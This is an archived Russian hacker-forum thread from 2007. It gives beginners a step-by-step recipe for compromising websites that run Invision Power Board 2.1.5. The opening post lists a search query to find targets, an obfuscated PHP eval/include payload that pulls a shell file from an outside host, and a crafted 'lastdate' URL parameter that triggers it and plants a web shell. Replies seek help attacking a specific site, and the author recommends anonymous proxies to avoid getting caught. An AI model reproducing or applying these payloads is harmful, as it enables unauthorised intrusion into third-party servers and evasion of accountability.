Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Статья №3

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Статья №3
Имя
Сообщение << Старые топики   Новые топики >>
Статья №3 - 2007-02-10 21:01:02.333333   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
IPB 2.1.5
Всем привет!!!

В этой статье я хочу рассказать по

взлом Форума сделаного на движке IPB 2.1.5

1)Как обычно мы идем поисковую систему

например в www.google.ru

там вводим Powered by invision power board v2.1.5 site:.ru inurl:index.php

2)регаемся на этом сайте

в поле мыло надо вводить не своё

настоящее мыло а чьё - нибудь (левое мыло) к которому

вы имеете доступ.

ну вот прошла удачно регистрация!

3)теперь надо найти тему которую никто в

данный момент не смотрит. что-бы не запалиться.

4)теперь в поле сообщение вводим

вот эту строчку(пока ресурс работает пользуйтесь)



eval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(97).chr(110).chr(117).chr(116).chr(97).chr(45).chr(114).chr(101).chr(98).chr(101).chr(110).chr(111).chr(107).chr(46).chr(98).chr(121).chr(46).chr(114).chr(117).chr(47).chr(115).chr(104).chr(46).chr(116).chr(120).chr(116))); //



5)далее надо пойти в поиск на данном форуме(который ломаете)

ввети там eval и ник под которым вы зарегились.

переходите на найденую вашу страничку

и в своем броузере где написана ссылка дописываете

вот это: lastdate=z|eval.*?%20//)%23e%00

6)при помоши сделанного выше вы заливаете шелл

но после удаления поста вы на него не попадете!

спасибо за внимание!!!



над статьей работал REDsaratov, Stefun, Web_Slayer.
Post #: 1
RE: Статья №3 - 2007-02-10 23:06:48.013333   
blacksun

Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
Пытался сломать один форум этим способом а меня кинуло вот сюды: http://sweb.ru/insecure
Post #: 2
RE: Статья №3 - 2007-02-11 16:14:40.973333   
CyLim4ik

Сообщений: 131
Оценки: 0
Присоединился: 2006-11-26 20:36:14.996666
Статья рулез!!!!!!!!!!!!!!!!!!!!!!!!!!!
Post #: 3
RE: Статья №3 - 2007-02-12 22:02:37.556666   
halkfild

Сообщений: 286
Оценки: 0
Присоединился: 2006-11-27 18:26:36.310000
интереснее почитать о багах ИПБ 2.1.7
Post #: 4
RE: Статья №3 - 2007-02-13 16:57:02.893333   
kultivator

Сообщений: 25
Оценки: 0
Присоединился: 2005-02-21 18:40:55
quote:

5)далее надо пойти в поиск на данном форуме(который ломаете)

ввети там eval и ник под которым вы зарегились.

переходите на найденую вашу страничку

и в своем броузере где написана ссылка дописываете

вот это: lastdate=z|eval.*?%20//)%23e%00

6)при помоши сделанного выше вы заливаете шелл

но после удаления поста вы на него не попадете!

спасибо за внимание!!!

сделал,а что делать раньше как я понял надаконектиться …ну а с помошью чего?куда к примеру адрес такой yandex-forum.ru/index.php?showtopic=14&st=20&lastdate=z|eval.*?%20//)%23e%00
хелп плз8|8|8|
Post #: 5
RE: Статья №3 - 2007-02-14 00:02:39.246666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
все описано нормально делай как написано! если не патчен форум то прокатит!
Post #: 6
RE: Статья №3 - 2007-02-14 00:04:33.560000   
kultivator

Сообщений: 25
Оценки: 0
Присоединился: 2005-02-21 18:40:55
блин ты видимо непонимаешь допустим прокатило а как мне узнать? и что теперь делать?????????
говорюже я вобще ноль [:(][:(][:(][:(]
Post #: 7
RE: Статья №3 - 2007-02-14 00:20:03.810000   
halkfild

Сообщений: 286
Оценки: 0
Присоединился: 2006-11-27 18:26:36.310000
а версия 2.1.7 только серьезные баги не иксСС хотя это тоже мона
Post #: 8
RE: Статья №3 - 2007-02-14 13:17:54.550000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

а версия 2.1.7 только серьезные баги не иксСС хотя это тоже мона

на двиг 2.1.7 нет серьёзныз уязвимостей только sql- инжекция и то админ должен быть лохом!
quote:

ORIGINAL:kultivator
блин ты видимо непонимаешь допустим прокатило а как мне узнать? и что теперь делать?????????

при дописывании вот этой строки в своем бруЗеРе lastdate=z|eval.*?%20//)%23e%00 ты автоматически перескочишь на шелл!
quote:

ORIGINAL:kultivator
говорюже я вобще ноль

а мне пох… кто ты!!! если ты 0 то лучше не суйся и наберись знаний, а потом будешь ломать!для начала лучше прокси подбери анонимный а то доломаешься
Post #: 9
RE: Статья №3 - 2007-02-14 15:27:42.446666   
kultivator

Сообщений: 25
Оценки: 0
Присоединился: 2005-02-21 18:40:55
quote:

а мне пох… кто ты!!!


ухахах всё с тобой ясно…..
Post #: 10
Страниц:  [1]
Все форумы >> [Для начинающих] >> Статья №3







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.